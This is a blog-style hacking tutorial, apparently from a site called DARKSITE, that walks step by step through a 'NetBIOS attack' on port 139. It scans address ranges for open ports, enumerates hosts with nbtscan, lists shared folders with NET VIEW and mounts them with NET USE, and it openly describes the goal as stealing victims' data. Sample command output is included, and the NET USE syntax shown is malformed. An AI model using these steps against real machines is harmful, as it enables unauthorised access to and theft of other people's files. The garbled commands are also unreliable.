Lets start here...
As we all know that particular services are running at specific ports. Means upto some ports , each port is assined particular servise. For example ftp (file transfer protocol) runs on port 21 , telnet runs on port 23 and Netbios service runs on port 139.
Netbios is used for file sharing on network. That means that this can run on port 139. we can access the file by port 139.
Details Information :
First off all you have to get the exe file of nbtscan(click on link). Once you a get copy of the exe file in C drive windows folder in system 32 folder. Then you will be able to use that at command prompt. Or you will recieve the error not internal or externel command.Step By Step:
1:-First of all we have to search that port 139 is open on any computer on lan or internet.
2:- For that use any port scanner (example superscan etc). Provide a range of ip addresses to it and scan. It will give all the open ports on the particular ip address. If you have a specific IP, I would recomend Nmap which can be downloaded off the oficial website here for windows users
See carefully which ip address has port 139 open or if using nmap if that port is open.
3:-Note/remember that ip address.
4:- now go to start>run>Cmd. and click enter
Once when u get command prompt. Type the following for performing the attack:
(1) nbtscan -v < ip address>
ip address is the address of that computer which has port 139 open.
Ex. Output is shown below: OUTPUT OF COMMAND PROMPT :
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\DON >nbtscan -v 10.1.A.76
(Note:A is any numeric value don"t get confused by it )
Doing NBT name scan for addresses from 10.1.A.76
NetBIOS Name Table for Host 10.1.A.76:
Name Service Type
----------------------------------------
BATA-SERVER <00> UNIQUE
MSHOME <00> GROUP
BATA-SERVER <03> UNIQUE
BATA-SERVER <20> UNIQUE
MSHOME <1e> GROUP
Adapter address: 00-02-44-a8-b8-77
----------------------------------------
5:-See carefully in above table in service if <20> is there then this means some files are shared on that computer.
6:- After this it is sure that u want to view all the shared files or folders on that computer. For that use the net command at the command prompt.
Type the following at command prompt:
NET VIEW \\ < IP ADDRESS >
This will show you all the shared files and folders on that computer.
7:- Once u will get this then definetily you want to access the shared files or folders.
For that just type the following at the command prompt:
NET USE C:\\ < IP ADDRESS >\temp
8:- so you get the access of the shared files and folders on that computer. And netbios attack is performed successfully.
This tutorial gives you some basic idea on staling victim's data from remote computer.stay tuned to DARKSITE for all new information
Thank you for reading...:)
Hit like us in Facebook,comments and share the information if it is useful for you.
Post a Comment
Feel Free To Ask Your Query we Love To Answer